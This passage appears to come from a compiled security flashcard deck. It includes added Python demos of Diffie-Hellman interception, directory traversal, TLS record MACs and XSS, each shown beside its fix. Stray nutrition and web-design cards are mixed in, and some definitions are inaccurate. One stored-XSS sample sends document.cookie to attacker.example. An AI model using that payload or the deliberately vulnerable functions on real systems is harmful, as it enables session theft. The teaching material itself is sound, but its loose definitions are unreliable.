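def shared_key(priv: int, peer_pub: int) -> bytes:
    """Derive a symmetric key from the Diffie-Hellman value g^(ab) mod p."""
    return hashlib.sha256(pow(peer_pub, priv, P).to_bytes(16, "big")).digest()


def honest_run():
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    return shared_key(a_priv, b_pub), shared_key(b_priv, a_pub)


def mitm_run():
    """Mallory replaces each public value in flight; both victims finish the protocol 'successfully'."""
    a_priv, a_pub = keypair()          # Alice
    b_priv, b_pub = keypair()          # Bob
    ma_priv, ma_pub = keypair()        # Mallory's key for her session with Alice
    mb_priv, mb_pub = keypair()        # Mallory's key for her session with Bob
    alice_key = shared_key(a_priv, ma_pub)    # Alice received ma_pub believing it to be Bob's
    bob_key = shared_key(b_priv, mb_pub)      # Bob received mb_pub believing it to be Alice's
    mallory_alice = shared_key(ma_priv, a_pub)
    mallory_bob = shared_key(mb_priv, b_pub)
    return alice_key, bob_key, mallory_alice, mallory_bob


def tag_pub(auth_key: bytes, pub: int) -> bytes:
    """Authenticated DH: bind the public value to a long-term authentication key (a signature under a certificate in TLS)."""
    return hmac.new(auth_key, pub.to_bytes(16, "big"), hashlib.sha256).digest()


def check_pub(auth_key: bytes, pub: int, tag: bytes) -> bool:
    return hmac.compare_digest(tag_pub(auth_key, pub), tag)


def authenticated_run_under_attack(auth_key: bytes):
    """Mallory swaps the public value but cannot produce a tag for it, so Bob rejects the substitute."""
    _, a_pub = keypair()
    tag = tag_pub(auth_key, a_pub)     # Alice sends (a_pub, tag)
    _, m_pub = keypair()               # Mallory forwards (m_pub, tag)
    return check_pub(auth_key, m_pub, tag), check_pub(auth_key, a_pub, tag)
```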
OWASP ZAP
Zed attack proxy. Intercept and edit HTTP requests.
Which type of attack against a web application uses a newly discovered vulnerability for which no patch is yet available?
Zero-day attack
How can you recover from loss of synchronization?
[RECEIVER] Try keystream offsets or request retransmission
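The synchronisation loss and recovery described on the "Synchronisation", "Keystream" and recovery cards, as an added example that is not from the original page. The keystream generator (HMAC-SHA256 in counter mode) is constructed for illustration and is not a standard stream cipher; the key, message and the "network dropped three bytes" event are likewise constructed. The receiver tries keystream offsets against a plausibility test for the protocol's message format and falls back to requesting retransmission if none fits.

```python
import hashlib
import hmac

BLOCK = 32   # bytes of keystream per HMAC-SHA256 output


def keystream(key: bytes, length: int, offset: int = 0) -> bytes:
    """Keystream bytes [offset, offset+length). Byte i is byte i % 32 of HMAC-SHA256(key, i // 32).
    Constructed for illustration only; not a standard stream cipher."""
    if length <= 0:
        return b""
    first, last = offset // BLOCK, (offset + length - 1) // BLOCK
    out = b"".join(hmac.new(key, b.to_bytes(8, "big"), hashlib.sha256).digest() for b in range(first, last + 1))
    start = offset - first * BLOCK
    return out[start:start + length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, data: bytes, offset: int = 0) -> bytes:
    """Encryption and decryption are the same XOR; 'offset' is the position in the keystream."""
    return xor(data, keystream(key, len(data), offset))


def looks_like_text(data: bytes) -> bool:
    """Receiver's plausibility test: this protocol only ever carries printable ASCII."""
    return all(32 <= c < 127 for c in data)


def resync(key: bytes, received: bytes, max_skip: int = 16):
    """Receiver recovery without retransmission: assume up to max_skip ciphertext bytes were lost,
    try each keystream offset and keep the first decryption that passes the plausibility test."""
    for skip in range(max_skip + 1):
        candidate = encrypt(key, received, skip)
        if looks_like_text(candidate):
            return skip, candidate
    return None, None   # nothing plausible: request retransmission instead


def demo():
    key = b"constructed-demo-key"             # constructed; derive real keys with a KDF
    plaintext = b"account=alice;amount=100;"
    ciphertext = encrypt(key, plaintext)
    received = ciphertext[3:]                 # the network dropped the first 3 ciphertext bytes
    naive = encrypt(key, received)            # receiver still at keystream position 0: garbage
    skip, recovered = resync(key, received)
    return naive, skip, recovered
```

Synchronising on a plausibility test is only safe when the format is rich enough that wrong offsets are rejected with overwhelming probability; an authenticated stream (MAC per record, as in TLS) is the sound way to detect lost or inserted data, with retransmission as the recovery.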
spoofing attack (man-in-the-middle)
a person or program masquerades as another by falsifying data
Conjugated Linoleic Acid (CLA)
a polyunsaturated fatty acid in which the position of the double bonds has moved so that a single bond alternates with two double bonds c-9, t-11 isomer(natural form) has anti-carcinogenic properties.t-10 c-12 isomer found in synthetic forms has anti-obesity effects. Highest in meat and milk from ruminants
data backup
a process in which copies of important computer files are stored in a safe place to guard against data loss
authentication
a security process in which the identity of a person is verified
Nutrient
a substance used by an organism to survive, grow, and reproduce
firewall
a system that prevents a specific type of info from moving between untrusted networks such as the internet and private networks
Cyber crime
a) Technology is the target e.g. hacking, computer viruses, DOS. b) Technology used as tools to enable the offence e.g. Phishing, identity theft, spam.
subject
active entity that requests access to an object or data within an object
proxy server
acts as an intermediary for requests from clients seeking resources from other servers
white box
all background and system information is provided
information security
all processes and procedures designed to protect an organisation's IS from unauthorised access
Antivirus Software
also known as virus scan software; uses several techniques to find viruses, worms, and spyware on a computer system, remove them if possible, and keep additional viruses, worms, and spyware from infecting the system
hacker
an individual who subverts computer security without authorization
Hacker
an individual who subverts computer security without authorization tools examples: key logging, packet sniffing, wireless network scanning, social engineering, phishing hacks
something you have
an item such as an ID card, smart card, keychain
heuristic detection
analyse overall structure of code, evaluates coded instruction and logic functions, and looks at type of data within virus or worm
static program analysis
analyse software without actually executing program
conficker worm
another worm with around 10 million infections
threat
any danger to which a system may be exposed
asset
any data, device, or other component of the environment that supports information-related activities
untrusted network
any network external to your organization; wireless is inherently nonsecure
Trusted Network
any network within organization
threat
any potential danger associated with exploitation of vulnerability
malware
any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems
storm worm
anywhere from 1-10 million systems mainly through trickery
administrative control
approved written policies, procedures, standards and guidelines
backup
archived copy of data used to restore original after incident occurs
Interior threats
are network security threats that originate from within a network, typically from registered users. College students are among the most targeted identities. Why? Because they have clean credit, and more damage can be done because most college students do not check their credit.
Polyunsaturated fatty acids:
are susceptible to oxidative damage
SYN flood
attack exploiting vulnerabilities of TCP 3 way handshaking mechanism
phishing
attack method with goal of obtaining personal information, login data, credit card number, or financial data
TLS data transfer problem
an attacker who controls the TCP stream can capture, drop, reorder or replay whole records without detection if each record's MAC covers only its own data. Solution: include the record sequence number (kept by both ends, never transmitted) in the MAC input, so a record that arrives out of order or a second time fails verification.
Directory Traversal
attacker supplies input to anything that takes a file path and uses ../ (or ..\ on Windows) to reach files outside the directory the program intends to serve, e.g. www.example.com/download?file=..\..\webConf\settings.conf. Filtering the string ".." is fragile (URL encoding, mixed separators); the reliable prevention is to canonicalise the resulting path and check that it still lies under the allowed base directory.
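The vulnerable concatenation beside the hardened check, as an added example that is not from the original page. WEB_ROOT is a hypothetical document root; the function uses posixpath so it runs as pure string handling without touching a filesystem. On a real filesystem, resolve symlinks with os.path.realpath before the containment check.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/srv/app/www"   # hypothetical document root


def vulnerable_path(user_path: str) -> str:
    """The pattern the card describes: the user-supplied string is appended to the base directory as-is."""
    return WEB_ROOT + "/" + user_path


def safe_path(user_path: str):
    """Canonicalise, then check containment. Returns None for anything that escapes WEB_ROOT."""
    decoded = unquote(user_path)               # decode %2e%2e and friends exactly once
    if "\x00" in decoded:
        return None                            # NUL truncation tricks against C-based file APIs
    decoded = decoded.replace("\\", "/")       # treat backslash as a separator too (Windows, lenient servers)
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))
    # commonpath compares whole components, so /srv/app/www-private does not pass as /srv/app/www
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    return candidate
```

Decoding exactly once matters: a double-encoded "%252e%252e" stays as a literal directory name "%2e%2e" under the root, which is harmless as long as nothing downstream decodes it again.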
TLS connection closure problem
attacker forges a TCP close (FIN) segment, so one or both parties think there is less data than there actually is (truncation attack). Solution: put a record type field inside the authenticated record (e.g. type 0: data, type 1: closure), so the end of the conversation is itself a MAC-protected message; in TLS this is the close_notify alert.
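The two fixes from the "TLS data transfer problem" and "TLS connection closure problem" cards, as one added example that is not from the original page: the MAC input is sequence number, record type and payload, so a reordered record, a replayed record and a forged closure all fail verification. The record format, the two type values and the sample messages are constructed for the demo; the key would come from the handshake's key derivation in a real connection.

```python
import hashlib
import hmac
import os
import struct

APP_DATA, CLOSE = 0, 1   # record types as on the card; TLS itself signals closure with a close_notify alert


def record_mac(key: bytes, seq: int, rtype: int, payload: bytes) -> bytes:
    """MAC input is sequence number || type || payload, so position and meaning are authenticated too."""
    return hmac.new(key, struct.pack(">QB", seq, rtype) + payload, hashlib.sha256).digest()


class Sender:
    def __init__(self, key: bytes):
        self.key, self.seq = key, 0

    def send(self, payload: bytes, rtype: int = APP_DATA):
        record = (rtype, payload, record_mac(self.key, self.seq, rtype, payload))
        self.seq += 1               # never transmitted: both ends simply count records
        return record


class Receiver:
    def __init__(self, key: bytes):
        self.key, self.seq = key, 0
        self.closed, self.failed = False, False
        self.delivered = []

    def receive(self, record) -> bool:
        rtype, payload, tag = record
        if self.failed or self.closed:
            return False
        if not hmac.compare_digest(record_mac(self.key, self.seq, rtype, payload), tag):
            self.failed = True      # bad_record_mac is fatal in TLS: the connection is torn down
            return False
        self.seq += 1
        if rtype == CLOSE:
            self.closed = True      # authenticated closure, unlike a bare TCP FIN
        else:
            self.delivered.append(payload)
        return True


def _session():
    key = os.urandom(32)            # constructed; in TLS this comes from the handshake's key derivation
    s = Sender(key)
    return s, Receiver(key), [s.send(b"transfer 100"), s.send(b" to bob"), s.send(b" now")]


def in_order():
    s, r, (r1, r2, r3) = _session()
    return [r.receive(r1), r.receive(r2), r.receive(r3), r.receive(s.send(b"", CLOSE))], r.closed


def reordered():
    _, r, (r1, r2, r3) = _session()
    return [r.receive(r1), r.receive(r3), r.receive(r2)], r.closed


def replayed():
    _, r, (r1, r2, _r3) = _session()
    return [r.receive(r1), r.receive(r1), r.receive(r2)], r.closed


def forged_close():
    _, r, (r1, _r2, _r3) = _session()
    forged = (CLOSE, b"", os.urandom(32))   # attacker cannot compute the MAC without the key
    return [r.receive(r1), r.receive(forged)], r.closed
```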
Network DOS attack
attacker floods the target with packets, usually with spoofed source IP addresses so the flood cannot be traced or filtered by source and so that any replies go elsewhere.
Nuke attacks
attempt to crash service through exploit in OS.
information security auditing
audit on level of information security in organisation
Biometrics
authenticates a person's identity using personal physical characteristics; fingerprint and retina scans are common. Dangers and problems: false matches and false non-matches (no biometric measurement is exact), and a compromised biometric cannot be changed the way a password can.
Worm
can replicate itself but does not need a host file; moves from system to system through networks rather than by files. Can be used to delete files, encrypt files, bog down networks or take over computers. Often moves fast: Storm worm, Conficker worm.
worm
can replicate itself but does not need a host file. it moves from system to system through networks rather than by files. often moves fast
Nuke: Echo/Chargen loop
character generator protocol (chargen): port 19, sends a stream of arbitrary characters to whoever connects. Echo protocol: port 7, sends back whatever it receives. A single UDP packet with a spoofed source of host A port 7 sent to host B port 19 makes the two services bounce traffic to each other indefinitely, consuming bandwidth and CPU on both.
What is the name of your local folder
cisweb2
Backdoor / Trapdoor
code designed to make a system simpler to penetrate for a future attack.
Logic/time bomb
code that executes when certain conditions are met
logic bomb
code that would set off a malicious function when specified conditions are met
Malware
code written to cause undesired effects in programs caused by an agent intent on damage. Written with the intent to cause harm
botnet
collection of Internet-connected programs communicating with other similar programs to launch DDoS attack
Phishing Scam
combines both fraudulent e-mail and web sites in order to trick a person into providing private information that can be used for identity theft hard to detect
phishing scam
combines both fraudulent e-mail and websites in order to trick a person into providing private info that can be used for identity theft
viruses, worms, spyware
common forms of malware
hypertext transfer protocol secure
communication protocol for secure communication over computer network
zombie
computer connected to Internet that has been compromised by a hacker and used to perform malicious task
sniffer
computer program or hardware that can intercept and log traffic passing over network
attack tree
conceptual diagram showing how an asset or target might be attacked
network security
concerned with addressing vulnerabilities and threats in computer networks that may or may not be connected to the internet
compliance
conforming to a set of requirements
Wabbit
continually replicating program that aims to exhaust resources
Direction Control Firewall Technique
controls direction of traffic in and out of network. Ingress monitoring and Egress monitoring.
control
countermeasure put into place to mitigate potential risk
internet fraud
crime of deliberately deceiving a person over the internet in order to damage them or obtain property or services unlawfully
identity theft
criminal act of stealing information about a person to assume that person's identity in order to commit fraud or other crimes
Which of these is NOT a state of data that DLP examines
data in-process Data that DLP examines: data in-use data in-transit data at-rest
configuration management database
data repository for information technology organisations
A lock that extends a solid metal bar into the door frame for extra security is the
deadbolt lock
Random Drops
dealing with non spoofed DDoS attacks. Assumes real user will reconnect but zombies won't.
Denial of Service attacks (DOS)
deny resources for legitimate users. Takes up resources until non left for OS.
procedures
detailed step by step tasks that should be performed to achieve a certain goal
stress test
determine stability of a given system or entity
tracking
determine whether source of incident was internal or external
Scanning
determines which of the systems are net accessible . which IP addresses are accessible, any obvious open doors. At its most basic, ping and address to see if its alive, scan the ports to see if they are open. Google the port numbers to get application, google the applications to get vulnerabilities
hacking
devising superficial fixes which are nothing more than auxiliary workarounds for problems
software testing
investigation to provide stakeholders with information about the quality and security of product/service under test
Cross Site Scripting (XSS)
enables attackers to inject client-side script into web pages viewed by other users; the script runs in the victim's browser under the site's origin and can steal session cookies or act as the user. Two main types: stored (the malicious script is saved on the server, e.g. in a comment, and served to every visitor) and reflected (the script is embedded in a URL and echoed back by the page, so the victim must be tricked into following the link). Defence: encode all untrusted data for the context it is inserted into (HTML body, attribute, script, URL).
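Reflected and stored XSS beside their fixes, as an added example that is not from the original page. The page fragments, the sample URLs and the comment store are constructed; the rendering functions are illustrative of the server-side templating step, not any framework's API. The attribute case shows why "escape < > &" alone is not enough: in a quoted attribute a double quote ends the attribute, so the quote must be encoded too.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Stored XSS: comments saved on the server and shown to every later visitor (constructed sample store)
COMMENTS = [
    "Great article!",
    "<script>document.location='https://attacker.example/?c='+document.cookie</script>",
]


def query_param(url: str, name: str) -> str:
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def reflected_vulnerable(url: str) -> str:
    """Echoes the search term straight into the HTML body: reflected XSS."""
    return f"<p>Results for: {query_param(url, 'q')}</p>"


def reflected_safe(url: str) -> str:
    """HTML-encode untrusted data for the body context."""
    return f"<p>Results for: {html.escape(query_param(url, 'q'), quote=True)}</p>"


def attribute_half_fixed(url: str) -> str:
    """Escaping < > & only: a double quote in the input still ends the value attribute."""
    return f'<input name="q" value="{html.escape(query_param(url, "q"), quote=False)}">'


def attribute_safe(url: str) -> str:
    """Quotes encoded as well, so the input cannot break out of the attribute."""
    return f'<input name="q" value="{html.escape(query_param(url, "q"), quote=True)}">'


def comments_vulnerable(store=COMMENTS) -> str:
    return "".join(f"<li>{c}</li>" for c in store)


def comments_safe(store=COMMENTS) -> str:
    return "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in store)
```

Output encoding is per context: the HTML-body encoding here is wrong for data placed inside a script block or a URL, which need their own encoders, and a Content Security Policy is the defence in depth behind all of them.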
cryptography
enables entity to store and transmit data in a form only available only to intended individuals
URL encoding
encodes URL with reserved characters
digital signature
hash of the message signed with the sender's private key (textbooks often say "encrypted"); anyone holding the public key can verify it
tunneling
encrypts each data packet to be sent and places each encrypted packet inside another packet
non-repudiation
ensures that someone cannot deny what he or she has done
security administrator
ensure security of environment is performed
certification authority
entity that issues digital certificates
physical control
environmental control of workplace and computing facilities
Online safety practices (experts/non experts)
experts: install software updates, use unique passwords, use two-factor authentication, use strong passwords, use a password manager. non-experts: use antivirus software, use strong passwords, change passwords frequently, only visit familiar websites, don't share personal information
security assessment
explicit study to locate security vulnerabilities and risks
session hijacking
exploitation of a valid computer session to gain unauthorised access to information or services in a computer system
Billion Laughs
exponential attack. XML parser ends up trying to parse 3 GB.
cyber terrorism
extends traditional forms of terrorism to the internet and the web
cyber warfare
extends traditional forms of warfare to the internet and the web
Cyber warfare
extends traditional forms of warfare to the internet and the web, including espionage, psychological warfare, and attacks; cyberterrorism
mac
FileVault is for?
Application Gateways
filter based on application data not just headers. Can see viruses, intrusions and policy violations.
Stateless Filter Firewall
filters packet by packet. Just looks at headers.
regression test
finding defects after a major code change
four pillars of information security
firewall, installing software patches, using security software, & practicing safe, cautious online behavior
corrective control
fixes problems after incident has occurred
software patch
fixes software bugs and flaws and is typically distributed to software users through online software updates
5 page properties you can set up when creating your CSS style sheet
font-family, color, background-color, background-image, text-align, margin, height, padding
CVSS
free and open industry standard for assessing severity of computer system security vulnerabilities
3 types of data backup
full backup: all files in the computer; selective backup: select which files to back up; three-generation backup: preserves three copies of important files in case of system failure or corrupted files. Restore files by copying them to the original location. Mac: Time Machine; Windows 8: File History
unauthorized access
gaining access to a computer, network, file or other resource without permission; often done with war driving
Unauthorized access
gaining access to a computer, network, file, or other resource without permission
piggybacking
gaining entry to restricted area by "tagging along" with authorised person
security policy
general statement produced by senior management that dictates what role security plays within the organisation
User Control Firewall Technique
gives access to users. Typically, users inside firewall.
need to know
giving access only to information absolutely required to perform job duty
Trojan Horse
Greeks vs. Trojans: seems harmless but carries a destructive payload; cannot self-replicate; payload can contain viruses, worms, spyware, backdoors; also has RATs
Network Usage Policy
is a document, agreement, or contract that defines acceptable and unacceptable uses of computer and network resources for a business or organization
Examples of Unauthorized access
hacking into wifi connections (often done in conjunction with war driving); interception of communications. Motivations for hacking: threat, hijacking computers, cyberterrorism, for fun (authorized vs. unauthorized hackers and white hat vs. black hat hackers)
Saponification
heating a fat under alkaline conditions: soap making (lard + lye). The Saponification Number of a fat or oil is defined as the number of milligrams of KOH needed to saponify 1 g of fat. Fats with long-chain fatty acids will have a lower number.
A ____ addresses a specific customer situation and often may not be distributed outside that customer's organization.
hotfix
A ________________ addresses a specific customer situation and often may not be distributed outside that customer's organization?
hotfix
Webpage address
https://astro.temple.edu/~tuj22891/
What is the full name of my home page?
https://astro.temple.edu/~tuj22891/index.html All About Me, Chandler
[5.4] Briefly explain the operation of a token-based challenge-response system.
i. A challenge is sent in response to an access request. The challenge is generally a number. ii. A legitimate user can respond to the challenge by performing a task which requires use of information only available to the user (and possibly the host). • The response is computed as a cryptographic one-way function of challenge and other info such as key and PIN. iii. User sends the response to the host. If the response is as expected by host, then access is granted.
[5.4] The synchronised one-time password generator is one method to provide user authentication. Describe the operation of the synchronised password generator method using clock-based tokens.
i. The user enters a PIN which is used together with the clock on the token to produce the current value. ii. The value changes for each time period. The user sends the current value to the host. iii. The host computes the same value using the algorithm with inputs: user's ID, PIN and clock value. iv. The host compares the received value with the computed value.
risk management
identification, assessment, and prioritisation of risk followed by coordinated and economical application of resources to minimise, monitor, and control the risk
detective control
identify an incident's activities and potentially an intruder
risk management
identify control and minimize impact of threats 1. risk analysis 2. risk mitigation 3. control evaluation
Weaknesses of Dos/DDoS
if flood stops, attack stops. Fix zombies, stop the attack. Attacker's machine can be exposed if not careful.
SYN Scanning
if the port is open, it responds with SYN/ACK. You return RESET, so no connection is established.
least privilege
implementation to ensure individuals access only need-to-know resources
improper installation & setup of computer systems
inadequate planning for & control of environment difficulties
errors in computer programming
inadequate planning for & control of equipment malfunctions
accountability
individual must be identifiable and must be held responsible for their action
Covering Tracks
an inexperienced attacker leaves evidence. Turning off event logging, clearing event logs, hiding malicious files left behind.
File virus
infects an executable and is activated on run
something you know
info such as a password or PIN
availability
information must be available to authorised entity
Laws
information security laws seek to protect the civil rights of populations from abuses of information systems and the internet
cross site scripting
inject client-side script into web pages viewed by other users
SQL Injection
injection attack where an attacker can execute malicious SQL statements that control a web application's database.
Trojan Horse
innocent code with malicious code hidden inside. Relies on social engineering since it can't spread by itself. Used to escalate privileges.
SQL injection
insert SQL code and run it on the database server
Spam Injection
inserts spam links into web server. Can divert revenue away from business.
exposure
instance of being exposed to loss
Application Attacks
instead of OS, attack application. Send legitimate traffic maliciously that is guaranteed to get through firewall.
3 types of web page links
internal, external, email
Installing back doors
intruder installs back door to make intrusions easier
Firewall
is network hardware or software that examines data packets flowing into and sometimes out of a network or computer in order to filter out packets that are potentially dangerous. Using a firewall is one of the four pillars of information security.
Data Backup
is a process in which copies of important computer files are stored in a safe place to guard against data loss. Data may be lost due to hardware failure, human error, software corruption, hackers, malware, or natural disasters.
Authentication
is a security process in which the identity of a person is verified
Encryption
is a security technique that uses high-level mathematical functions and computer algorithms to encode data so that it is unintelligible to all but the intended recipient. Useful in situations where the information you are storing is confidential or valuable, and there is a possibility that your computer can be accessed by others, lost, or stolen. Ex. Mac (FileVault), Windows (BitLocker); you can also purchase encrypted flash drives.
Social Engineering
is an attack in which the perpetrator uses social skills to trick or manipulate a legitimate employee into providing confidential company info: impersonation, tailgating, shoulder surfing
standard
mandatory activities, actions or rules
Internet fraud
is the crime of deliberately deceiving a person over the internet in order to damage them or to obtain property or services unlawfully
possessed object
item that you must carry to gain access to a computer or facility; often used with a number password called a personal identification number (PIN); 2-step verification
possessed object
item that you must carry to gain access to computer or facility... often used with PIN
Defending against DoS
keep the following updated: AV, OS, software. Firewall set up right. Protocol modifications for SYN cookies and random drops. Provide excess bandwidth. Replicated servers. Limit the rate of traffic. TCP intercepting firewalls. DDoS scrubbing service.
hacker tools
key-logging, packet-sniffing, wireless network scanning, port-scanning, social engineering
the residential lock most often used for keeping out intruders is the
keyed entry lock
non disclosure agreement
legal contract outlining confidential material, knowledge, or information shared between parties that wish to restrict access by third parties
risk
likelihood of a threat agent exploiting a vulnerability and corresponding business impact
Whitelisting
list of acceptable websites/resources/rules. Assumes evil.
Blacklisting
list of banned websites/resources/rules for firewall to reject.
Password choice
longer passwords provide greater security; keep passwords secret; do not write them down; change them frequently
Anti Virus Behavior Blocking
look for suspicious behavior and stops it.
Connection Table
maintained by firewall of list of active TCP connections.
trojan horse
malware that disguises as another program
Virus
piece of self-replicating software that infects a computer without the user's knowledge or permission; attaches to a host; can be downloaded, emailed, and picked up by removable storage devices (flash drives); embeds itself into programs, files, and devices; used to destroy data or keep systems from working
virus
piece of self-replicating software that attaches to a host and infects a computer without the user's knowledge or permission. It is used to destroy data or keep systems from working.
ICMP Flood
ping flood. Solved by disallowing ICMP packets from outside the network.
Buffer Overflows
poorly written programs that kill servers, return error messages to attackers and allow attackers to run their own code on the machine.
NMap
port scanning software. Gets information of the machine
vulnerability
possibility the system will be harmed by a threat
information security
practice of defending information from unauthorised access, use, disclosure, disruption, modification, perusal, inspection, recording or destruction
three-generation backup
preserves three copies of important files
confidentiality
preventing disclosure of information to unauthorised individuals or systems
risk
probability a threat will impact an info resource
authentication
process of confirming the truth of an attribute of a datum or entity
screening
process of disqualifying candidates using detailed examinations
risk analysis
process of understanding impact and criticality of risk
authorisation
process of verifying that a particular identity is permitted to perform a particular action
Worm
program that copies itself through a network. Standalone program that doesn't attach to other files; operates through networks. Has to be caught early. Slow down traffic to halt the worm.
fuzzer
providing invalid, unexpected, or random data as input for a computer program
reverse proxy
proxy server that appears to be ordinary server to clients
guidelines
recommended actions and operational guides when specific standard does not apply
3 image map hotspot tools
rectangle, circle, polygon
risk mitigation
reduce risk to acceptable level to continue conducting business
botnet
refers to a collection of computers autonomously or automatically working together toward some goal
Uniform Resource Locator (URL)
refers to a resource, can also pass data to server. consists of protocol, domain, path, query string
Machine Level Security
refers to actions taken to protect information on a computer that may or may not be connected to a computer network or the internet
permissions
refers to specific access privileges afforded to each network user and each system resource in terms of which files, folders, and drives each user can read, write, & execute
information theft
refers to the access of information by an unauthorized person for financial gain or other benefit
information security
refers to the protection of information systems and the information they manage against unauthorized access, use, manipulation, or destruction, and against the denial of service to authorized users
Information Security
refers to the protection of information systems and the information they manage against unauthorized access, use, manipulation, or destruction, and against the denial of service to authorized users (as the Symantec video states)
Permissions
refers to the specific access privileges afforded to each network user and each system resource in terms of which files, folders, and drives each user can read, write, and execute
internet security
refers to the unique threats and defenses associated with computers connected to the internet
wireless security
refers to the unique threats and defenses associated with wireless computer networks; war driving
Eicosanoids
regulatory molecules that can be synthesized from omega-3 and omega-6 fatty acids. Essential fatty acids are converted to eicosanoids.
residual risk
remaining risk after placing a control
virus
replicates by inserting copies of itself into other computer programs, data files, or boot sector of hard drive
feasibility study
research activities to verify project worth
user
routinely uses data for work-related tasks
port scanning
searching for open ports of server or host
war driving
searching for wireless networks by a person in a moving vehicle
Backdoor
secret entry into system
virtual private network
secure, private connection through untrusted network
system hardening
securing a system by reducing surface of vulnerability
black hat
security professional with a hacking background
white hat
security professional with info sec skills and knowledge but no hacking background
Wi-fi protected access
security protocol and security certification programs to secure wireless computer networks
log
security-relevant chronological record that provides documentary evidence of the sequence of activities of an operation, procedure, or event
encryption
security technique that uses high-level mathematical functions and computer algorithms to encode data so that it is unintelligible to all but intended person
trojan horse
seems harmless but carries a destructive payload; cannot self-replicate; payload can contain viruses, worms, spyware, backdoors; has RATs
How to import an ste file and what to do when the dialog box pops up asking for a local root folder
select Site, then Manage Sites, and then import the .ste file (make sure you have the .ste file, then select it from your flash drive; double-click on your .ste file). If pop-ups come up, you have to navigate to the flash drive, find the website folder, select your .ste file and click Done.
selective backup
select which files to backup
Virus
self-replicating program that installs itself without your consent. Modifies other files. Spreads through any medium. Has an infection mechanism, a trigger that causes the payload to happen, and a payload (something bad that happens). Life cycle: dormancy, when the virus sits in memory/storage and waits; propagation, when the virus replicates; triggering, when a condition is met; execution, when the payload is dropped. Three-component model of a virus: the wild component is how widely the virus already exists in the wild; the damage component is how much damage it could do; the distribution component is how quickly it can spread.
Nuke: Land attacks
send a packet with the target as both the source and destination. The target ties itself in a knot trying to connect with itself.
teardrop attack
send malformed fragments that once reassembled destabilise victim's system
Smurf attack
send many echo requests to many smurfs with the source IP set to the target. All smurfs send reply packets to the target.
ping of death
sending malicious or malformed ping
bluejacking
sending unsolicited messages over Bluetooth from one Bluetooth-enabled device to another Bluetooth-enabled device
Flooding attacks
sends too many packets for targets to handle. Exhausts resources replying to packets.
TLS Weakness
server certificate can be spoofed. NSA has access. TCP/IP not encrypted
CSRF preventions
server should check request headers. anti-CSRF tokens
cryptosystem
set of algorithms required to implement cryptography
public key infrastructure
set of roles, policies, and procedures needed to create, manage, distribute, use, store, and revoke digital certificates
7 form components used to collect information online using Google Forms
short answer, multiple choice, drop down, paragraph, check boxes, linear scale, multiple choice grid
DNS poisoning
situation in which DNS server resolves a host name into an incorrect IP address
critical software flaws
software bugs in operating systems can create what?
rootkit
software designed to hide existence of certain process/programs from normal methods of detection
Attacking
the attacker accomplishes their goal
Password problems
the average person has between 7 and 25 accounts they log into every day; people report authenticating about 15 times in a typical work day; on average 70% of people do not use a unique password for each website; around 82% of people have forgotten a password they used; many don't pick strong passwords
A lock that extends a solid metal bar into the door frame for extra security is the ____________.
the dead bolt lock
security
the degree of protection against criminal activity, danger, damage and/or loss
TLS and SSL
Transport Layer Security and Secure Sockets Layer; used for credit card purchases and online banking; indicated by HTTPS; a form of encryption
honeypot
trap set to detect or deflect attempts at unauthorised use of information systems
digital certificate
type of electronic business card that is attached to internet transaction data to verify the sender of the data
firewalking
utilises traceroute techniques and TTL values to determine gateway ACL filters and map the network
risk acceptance
understand level of risk and not implementing a countermeasure
zero-day vulnerability
undisclosed computer-software vulnerability
something about you
unique physical characteristics such as fingerprints, retinal patterns, & facial features
Virus/Trojan/Worm Prevention
update, harden system to only allow some to access, malware awareness.
technical control (logical)
use of software and data to monitor and control access
Redirect
used by routers to tell hosts "send messages meant for IP 1.2.3.4 to 5.6.7.8"
What is a thumbnail used for in relation to an image gallery?
used to create a uniform and clean look; it is a preview of the actual image shown once you click on the thumbnail (thumbnail size 85)
Ipconfig
used to obtain local information about network IP addresses, MAC address, gateways, DHCP hosts, etc.
antivirus software
uses several techniques to find viruses, worms, & spyware on a computer system; remove them if possible
Unauthorized use
using a computer for unauthorized activities
Dorking
using advanced google searches to reveal vulnerable websites
google hacking
using google applications to find security holes in configuration and computer code that websites use
key
value that comprises a large sequence of random bits/numbers/characters
which of the following cannot be used along with fencing as a security perimeter?
vapor barrier
VPNs
virtual private networks integrate the global connectivity of the internet with the security of a private network; use encryption to enhance privacy; use tunnelling
Anti virus Sandboxing
virus must decrypt on execution. Run program in virtual environment.
What does Social engineering look like?
• A cybercriminal befriends one of our clients and builds trust over time, until they are able to solicit sensitive information from them. • That information can then be used to commit fraud.
What is Viruses?
• A virus is a piece of software that has been written to insert copies of itself into applications and data and onto crucial parts of a computer's hard disk. • Even where no harm is intended, viruses consume memory, disk space and processing power.
What does phishing look like?
• An email, phone call or text message from a seemingly legitimate email address or number instructs you to click on a link to take action (e.g., "validate your account," "confirm your identity," "access your tax refund," "reset your password," etc.) • The link brings you to a website requiring you to enter your personal/sensitive/secret information.
Privacy Amendment (Enhancing Privacy Protection) Act 2012 applies to:
• Australian federal government agencies, • ACT and Norfolk Island government agencies, • Private-sector businesses with annual turnover > $3 million • Private-sector health service providers
Authenticity Attack - Fabrication
• Authentication - Information really came from the person we think it came from - Verification of the identity of the person. • Authenticity attack - Unauthorized assumption of another's identity - Generate and distribute objects under this identity.
Implementing Security Objectives? AAAA
• Authentication - Who are you? - Prove what you claim you are. • Authorization/Access control - Control who is allowed to do what to the information assets - Are you allowed to do this and that? Under which condition(s)? • Auditing - Check if anything went wrong • Action - If so, take action to rectify the 'wrong.'
Access Control to Assets
• Authentication (Prove what you claim you are.) - Submit credentials to access an asset (function, information) • e.g., password, fingerprint, identification card • Authorization (Prove you have permission to do this) - Must be authorized to gain access to specific data, other computing resources. • e.g., file systems, firewalls, application authorization model • Various levels of granularity
Sources of Software Vulnerabilities
• Bugs in the application or its infrastructure - Doesn't do what it should do • access flag can be modified by user input • Inappropriate features in the infrastructure - Does something that it shouldn't do • functionality winning over security • a search function that can display other users info • Inappropriate use of features provided by the infrastructure • Main causes: - Complexity of these features • functionality winning over security, again - Ignorance of developers
Spyware Symptoms
